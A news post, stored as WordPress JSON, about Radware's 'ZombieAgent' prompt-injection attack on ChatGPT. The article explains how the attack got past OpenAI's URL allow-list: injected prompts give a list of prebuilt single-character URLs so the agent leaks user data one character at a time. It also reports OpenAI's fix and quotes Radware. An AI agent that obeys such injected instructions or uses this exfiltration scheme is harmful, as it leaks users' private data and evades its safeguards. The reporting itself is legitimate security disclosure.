{"id":211,"date":"2026-01-08T19:47:59","date_gmt":"2026-01-08T19:47:59","guid":{"rendered":"https:\/\/nile1.com\/en\/?p=211"},"modified":"2026-01-11T23:38:23","modified_gmt":"2026-01-11T23:38:23","slug":"chatgpts-ongoing-battle-new-zombieagent-attack-bypasses-url-safeguards","status":"publish","type":"post","link":"https:\/\/nile1.com\/en\/2026\/01\/08\/chatgpts-ongoing-battle-new-zombieagent-attack-bypasses-url-safeguards\/","title":{"rendered":"ChatGPT&#8217;s Ongoing Battle: New &#8216;ZombieAgent&#8217; Attack Bypasses URL Safeguards"},"content":{"rendered":"<p>OpenAI implemented a strict URL policy for ChatGPT, allowing it to open only exact links and preventing the addition of parameters. This measure successfully countered ShadowLeak, an attack that exploited the large language model&#8217;s ability to create new URLs by combining words, appending query parameters, or inserting user data.<\/p>\n<p>However, Radware researchers devised ZombieAgent, a straightforward modification to the prompt injection technique. Their method involved providing a comprehensive list of pre-constructed URLs, each appending a single character\u2014a letter (e.g., example.com\/a, example.com\/b) or a number (example.com\/0 through example.com\/9)\u2014to a base URL. The prompt also directed the agent to replace spaces with a specific token.<\/p>\n<figure><figcaption>Diagram illustrating the URL-based character exfiltration for bypassing the allow list introduced in ChatGPT in response to ShadowLeak.<br \/>Credit: Radware<\/figcaption><\/figure>\n<p>ZombieAgent succeeded because OpenAI&#8217;s restrictions did not prevent the appending of a single character to a URL. This oversight enabled the attack to exfiltrate data one character at a time.<\/p>\n<p>OpenAI has since addressed ZombieAgent by limiting ChatGPT&#8217;s ability to open links from emails. The model now only opens such links if they are listed in a public index or explicitly provided by the user within a chat prompt. This adjustment aims to prevent the agent from accessing base URLs controlled by attackers.<\/p>\n<p>OpenAI&#8217;s experience reflects a common challenge in cybersecurity: the continuous cycle of mitigating an attack only for it to reappear with minor alterations. This pattern, reminiscent of persistent threats like SQL injection and memory corruption vulnerabilities, is expected to continue indefinitely, providing attackers with ongoing opportunities to compromise software and websites.<\/p>\n<p>Pascal Geenens, VP of threat intelligence at Radware, emphasized that \u201cGuardrails should not be considered fundamental solutions for the prompt injection problems.\u201d He added, \u201cInstead, they are a quick fix to stop a specific attack. As long as there is no fundamental solution, prompt injection will remain an active threat and a real risk for organizations deploying AI assistants and agents.\u201d<\/p>\n","protected":false},"excerpt":{"rendered":"<p>OpenAI implemented a strict URL policy for ChatGPT, allowing it to open only exact links and preventing the addition of parameters. This measure successfully countered ShadowLeak, an attack that exploited the large language model&#8217;s ability to create new URLs by combining words, appending query parameters, or inserting user data. However, Radware researchers devised ZombieAgent, a &hellip;<\/p>\n","protected":false},"author":1,"featured_media":213,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"https:\/\/cdn.arstechnica.net\/wp-content\/uploads\/2026\/01\/blog_zombie-agent_img9-url-based-exfiltration-1024x722.jpg","fifu_image_alt":"","footnotes":""},"categories":[5],"tags":[314,312,230,317,265,313,318,316,315],"class_list":["post-211","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-technology","tag-ai-security","tag-chatgpt","tag-cybersecurity","tag-llm-vulnerabilities","tag-openai","tag-prompt-injection","tag-radware","tag-shadowleak","tag-zombieagent"],"_links":{"self":[{"href":"https:\/\/nile1.com\/en\/wp-json\/wp\/v2\/posts\/211","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/nile1.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/nile1.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/nile1.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/nile1.com\/en\/wp-json\/wp\/v2\/comments?post=211"}],"version-history":[{"count":2,"href":"https:\/\/nile1.com\/en\/wp-json\/wp\/v2\/posts\/211\/revisions"}],"predecessor-version":[{"id":214,"href":"https:\/\/nile1.com\/en\/wp-json\/wp\/v2\/posts\/211\/revisions\/214"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/nile1.com\/en\/wp-json\/wp\/v2\/media\/213"}],"wp:attachment":[{"href":"https:\/\/nile1.com\/en\/wp-json\/wp\/v2\/media?parent=211"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/nile1.com\/en\/wp-json\/wp\/v2\/categories?post=211"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/nile1.com\/en\/wp-json\/wp\/v2\/tags?post=211"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}